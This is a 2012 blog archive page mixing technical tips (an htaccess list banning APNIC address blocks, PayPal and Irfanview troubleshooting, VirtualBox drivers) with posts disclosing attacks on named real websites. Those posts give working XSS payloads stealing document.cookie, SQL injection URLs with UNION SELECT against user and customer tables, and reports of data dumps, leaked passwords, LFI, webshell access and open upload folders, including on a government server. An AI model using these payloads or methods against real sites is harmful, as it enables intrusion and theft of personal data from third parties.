Showing posts from 2012

Ban Asian IP addresses. Ban Chinese spammers with htaccess

After receiving tons of spam on a few websites, I've decided to ban the whole APNIC address space.

Since I've not found anything to ban the whole of APNIC, I've searched for the assigned classes that they manage.
How to ban Chinese spammers.

P.S. I've added a few LACNIC
(last update 2012-11-16)

Download the file here, or just add the content to a .htaccess file, and the spam from Asia should be gone.
Put the .htaccess in the main (or any other) folder of your website.
You can use the same approach to ban any other IPv4 address space.

__________.htaccess____________
#list retrieved from
#http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt

#Banning APNIC
deny from 1.0.0.0/8
deny from 14.0.0.0/8
deny from 27.0.0.0/8
deny from 36.0.0.0/8
deny from 39.0.0.0/8
deny from 42.0.0.0/8
deny from 43.0.0.0/8
deny from 49.0.0.0/8
deny from 58.0.0.0/8
deny from 59.0.0.0/8
deny from 60.0.0.0/8
deny from 61.0.0.0/8
deny from 101.0.0.0/8
deny from 103.0.0.0/8
deny from 106.0…
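
The approach described above, automated as an added example (not part of the original post): it reads rows in the column layout of the IANA `ipv4-address-space.txt` file and emits either the `deny from` lines used in the listing or the Apache 2.4 `Require not ip` form. The sample rows are constructed and the function names are assumptions.

```python
import ipaddress
import re

# Constructed sample in the column layout of IANA's ipv4-address-space.txt
# (prefix, designation, date, whois, rdap, status); not a copy of the live file.
SAMPLE = """\
   Prefix  Designation            Date     WHOIS             RDAP                      Status
   001/8   APNIC                  2010-01  whois.apnic.net   https://rdap.apnic.net/   ALLOCATED
   002/8   RIPE NCC               2009-09  whois.ripe.net    https://rdap.db.ripe.net/ ALLOCATED
   014/8   APNIC                  2010-04  whois.apnic.net   https://rdap.apnic.net/   ALLOCATED
   043/8   Administered by APNIC  1991-01  whois.apnic.net   https://rdap.apnic.net/   LEGACY
   177/8   LACNIC                 2010-06  whois.lacnic.net  https://rdap.lacnic.net/rdap/ ALLOCATED
"""

# "NNN/8", then the designation, then at least two spaces before the YYYY-MM date.
ROW = re.compile(r"^\s*(\d{3})/8\s+(.+?)\s{2,}\d{4}-\d{2}\b")

def blocks_for(registry_text, registry, include_legacy=True):
    """Return the /8 networks whose designation names `registry`."""
    wanted = {registry}
    if include_legacy:
        # Legacy blocks are listed as "Administered by <registry>".
        wanted.add(f"Administered by {registry}")
    nets = []
    for line in registry_text.splitlines():
        m = ROW.match(line)
        if m and m.group(2).strip() in wanted:
            nets.append(ipaddress.ip_network(f"{int(m.group(1))}.0.0.0/8"))
    return nets

def render(nets, apache24=False):
    """Emit 2.2-style 'deny from' lines, or a 2.4 RequireAll block."""
    if not apache24:
        return "\n".join(f"deny from {n}" for n in nets)
    body = "\n".join(f"    Require not ip {n}" for n in nets)
    return f"<RequireAll>\n    Require all granted\n{body}\n</RequireAll>"

if __name__ == "__main__":
    print(render(blocks_for(SAMPLE, "APNIC")))
    print(render(blocks_for(SAMPLE, "LACNIC"), apache24=True))
```

On Apache 2.4 the `deny from` directive only works when mod_access_compat is loaded; the `Require not ip` form is the native one.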

[Solved] Irfanview "disk is full" error

While using the batch processing of Irfanview you can encounter this error: "disk is full".
The error happens when you've set it to overwrite the previous files (advanced conversion settings) and they are *locked*.
Check if the file can be written by your Windows User, check that the file is not read only, check if the file is not locked by another process.


______________________Remove read only____________________
Right-click on the file.
Click on Properties.
Click on the General tab, clear the Read-only check box, and then click OK (confirm also to apply to all the subfolders).
___________________________________

AMD PCNET Family PCI Ethernet Adapter - Windows XP, 2003 Drivers

It could happen that you cannot find the drivers (AMD PCNET Family PCI Ethernet Adapter - not installed) of the Ethernet (NIC) adapter that is used in VirtualBox.

 PCI\VEN_1022&DEV_2000&SUBSYS_20001022&REV_40\3&267A616A&0&18

I've also found this link https://www.virtualbox.org/ticket/3411 but I was unable to see a working download.

Since the links to the AMD website are failing and it seems that they cannot be found on the website, I'm adding a new link.

Here you can download the AMD PCNET drivers for VirtualBox.

They have been tested with Windows XP 32bit and VirtualBox 4.2.0 r80737.
After a bit of time I've tested them with Windows 7 pro 32bit (a slim version) and they work.
They also work on Windows 2003 R2 (thanks to David Acosta).


If you have a direct link to the AMD website or any other good information just add it in the comments.

primomaggio.com | XSS

POST
http://www.primomaggio.com/newsletter.php

POSTDATA
nome=chick&cognome=chick&email=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Echick%40mailinator.com&x=40&y=7&send=1

_____
An SQL injection was available in the login area of the forum of the previous website (in ASP, as far as I can remember).

Paypal PDT/IPN - HTTP Error 302

The PayPal PDT/IPN HTTP status error 302 happens when you are contacting PayPal via HTTP while (as far as I can understand) they have enforced that requests be made via SSL (443, HTTPS) and not as plain HTTP requests (80, HTTP).
It happens in sandbox and live.

Paypal PDT error 4003 problem

The PayPal error 4003 (when receiving PDT) could happen when the server is doing too many requests/validations for the same "tx" (transaction id) with a cmd=_notify-synch. PayPal will not send back the data after about 5 requests.

Sometimes the error could happen randomly in sandbox. This shouldn't happen in "live".

Paypal merchant_return_link problem

merchant_return_link=click+here
merchant_return_link=return+to+merchant
merchant_return_link=*


It could happen if:
the client browser is clicking the button while not accepting/using/respecting the META tag redirection
the autoreturn is set to off in the merchant account

URL rewriting could be a solution.

antiproibizionisti.it | Sql injections, data leak, system compromise

Since the website has been closed (I'm sorry for that), here is some (old) information.

***Remember that I've never abused any website or modified anything or used confidential data.***


http://www.antiproibizionisti.it/ricerca.asp?page=1&trova=(%20Advid%20)';%20trunca

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][Driver ODBC Microsoft Access] Errore di sintassi (operatore mancante) nell'espressione della query



/inc_ricerca.htm, line 12



--------------
http://antiproibizionisti.it/archivio_sdf.asp?f=1'0

http://antiproibizionisti.it/display_gessa.asp?f=3629&u='9
http://antiproibizionisti.it/archivio_gessa.asp?f='9

http://antiproibizionisti.it/display.asp?f=4177&u=10

http://antiproibizionisti.it/archivio_sdf.asp?f=10%20union%20select%20sum(nome),1,2,3,6,4,4,5%20from%20user
http://antiproibizionisti.it/archivio_sdf.asp?f=10%20UNION%20SELECT%20id,%20name,%20'','','','','',''…

askyp.com | sql data dump, data leak

Too much data to dump. Anyway I've deleted everything (here ... ).

64.233.183.104 (??? google ???) | sql data dump, data leak

I found this data some time ago...


nursery-info.net | Sql injection, data leak (sql dumps), system compromise

The website is dead so ... I can publish something.

The main table


meridiana.it | SQL Injection

Since the injection was fixed some time ago ... I'll just publish some samples (nothing confidential).

Sample error
[TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY N1 ASC, ID_Head DESC' at line 1

/ita/web/index.asp, line 15


db: Sql39909_2
sample table -> clienti
columns -> cliente, indirizzo, data, telefono

sample injection
http://www.meridianaitalia.it/ita/web/index.asp?id_menu=3%20UNION%20Select%20*%20from%20Sql39909_2.clienti/*&menu=Newa

old unisannio.it hosts (2003/2004?)


old joe accounts of free websites


Old accounts, dead websites, old passwd


kutuphane.tuik.gov.tr | data leak, system compromise, HTTP splitting, XSS.

-Data leak-

http://kutuphane.tuik.gov.tr/yordambt/liste.php?-skip=0&-atla=0&-sayfa=01&Alan3=&Alan5=&anatur=&bolum=&alttur=&sekil=&ortam=&dil=&yayintarihi=&kgt=&gorsel=&kurumyayini=&cAlanlar=pollo&aa=eseradi&-max=16&universite=&enstitu=&anabilimdali=&bilimdali=&sureliilkharf=&sure=&biryil=&birdergitrh=&birsayi=&biricindekiler=

We can see the full path within the errors
-> C:\Inetpub\wwwroot\yordambt
ex file: _dil.php | index.php | liste.php | _yardim.php | arama.php | anasayfa.php | url.php

After getting access through an LFI it's possible to see that we are on a (Windows) box with the default configuration, with the permissions for -everybody- in some important folders. It's possible to operate quite like an administrator with a simple -webshell- script.
There are some shared folders without password on other boxes.
------

The scripts available from the website are (also…

www.ascension-tech.com | XSS

This XSS is locked by the webserver:
www.ascension-tech.com/searchresults.asp?searWords=<script>alert(document.cookie);</script>&Go.x=0&Go.y=0

This one is working without problems because there's a JavaScript that is using the input without sanitizing it. It seems that only the first ' single quote is escaped... and we add another one.
http://www.ascension-tech.com/searchresults.asp?searWords=%27%27%3Balert%28%271%27%29%3Bvar+asd%3D%27&Go.x=12&Go.y=12


The problem is within "Search Engine Builder 2010"

www.ovosodo.net | Flash XSS - Sql Injections - possible upload of scripts - administrator privileges escalation (system compromise)

(they are not working anymore - check webcaches)
www.ovosodo.net
XSS in the requests (simple)

SQL injection (there's no need to write the injection string ... it's very simple)
http://www.ovosodo.net/area_clienti.asp

After *login* it's possible to upload anything, and it will be available in
http://www.ovosodo.net/images/upload/originali/